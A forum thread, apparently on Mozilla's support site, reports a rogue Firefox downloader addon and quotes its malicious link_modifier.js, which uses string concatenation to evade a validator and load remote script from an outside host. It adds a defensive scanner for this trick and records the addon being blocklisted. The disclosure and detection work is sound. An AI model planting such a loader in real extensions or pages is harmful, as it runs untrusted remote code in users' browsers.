Rogue YouTube Video Downloader addon hijacking links and injecting pop ups

The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop up ads. Homepage.

This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/

A quick inspection of its source code already shows a red flag in its include folder contents, namely the link_modifier.js file, which contains the following code in its entirety:

var s = document.createElement('scr'+'ipt');
s.type = 'text/ja'+'va'+'scr'+'ipt';
s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js';
document.getElementsByTagName('head')[0].appendChild(s);

It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by creating a dangerous element via string concatenation. In this file it loads and executes an external script.

I didn’t find any notice/content policy informing the user of this malware-like behavior and don’t think I needed to inspect more of the source code after finding that file.

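A static check for the concatenation trick described in the post above, as an added example that is not part of the original thread or of AMO's validator: it folds string literals joined by `+` before looking for script-element creation and a remote `src`. The function names are hypothetical, and the regex pass is a triage heuristic, not a JavaScript parser.

```javascript
// Added example: heuristic triage of addon source, not a full JS parser.

// Fold adjacent same-quote string literals joined by '+',
// e.g. 'scr'+'ipt' -> 'script'. Repeats until nothing more folds.
function foldStringConcats(src) {
  const pair = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1\s*\+\s*\1((?:\\.|(?!\1)[^\\\n])*)\1/g;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (_m, q, a, b) => q + a + b + q);
  } while (src !== prev);
  return src;
}

const CREATE_SCRIPT = /createElement\(\s*['"]script['"]\s*\)/i;
const REMOTE_SRC = /\.src\s*=\s*['"]((?:https?:)?\/\/[^'"\s]+)['"]/gi;

// Report script-element creation, whether it was only visible after
// folding (i.e. hidden by concatenation), and any remote src URLs.
function scanSource(src) {
  const folded = foldStringConcats(src);
  const createsScript = CREATE_SCRIPT.test(folded);
  return {
    createsScript,
    hiddenByConcat: createsScript && !CREATE_SCRIPT.test(src),
    remoteSrc: [...folded.matchAll(REMOTE_SRC)].map((m) => m[1]),
  };
}

// The link_modifier.js snippet as quoted in the post.
const QUOTED_SAMPLE = [
  "var s = document.createElement('scr'+'ipt');",
  "s.type = 'text/ja'+'va'+'scr'+'ipt';",
  "s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js';",
  "document.getElementsByTagName('head')[0].appendChild(s);",
].join('\n');

// Constructed benign sample: concatenation and a local image only.
const BENIGN_SAMPLE = [
  "var label = 'Down' + 'load';",
  "var img = document.createElement('img');",
  "img.src = 'icons/dl.png';",
].join('\n');

console.log(scanSource(QUOTED_SAMPLE));
console.log(scanSource(BENIGN_SAMPLE));
```

A hit on `hiddenByConcat` is the signal worth escalating to manual review, since plain string scanning of the unfolded source would have missed the element type.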

I have just filed a blocklist request for this addon.

https://bugzilla.mozilla.org/show_bug.cgi?id=1231010

Thanks for reporting!


Thanks @Swarnava and @nathan for this report, can you please link us to the listing on addons.mozilla.org (AMO)?

This is an unlisted addon; it is hosted on the developer’s website from what I could gather: http://addoncrop.com/youtube_video_downloader/


This is an unlisted addon; it is hosted on the developer’s website from what I could gather. Can’t post its link here because it triggers the spam filter, but a user posted that link in the reddit thread.

Thanks for that, but there is a problem. When you copied the thread link you also copied the number of clicks the link had, which was 1. This causes the mentioned link to fail when someone tries to open it because it ends with “1”.


Just an FYI, the addon is now blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1077

Yes, thank you for the reports!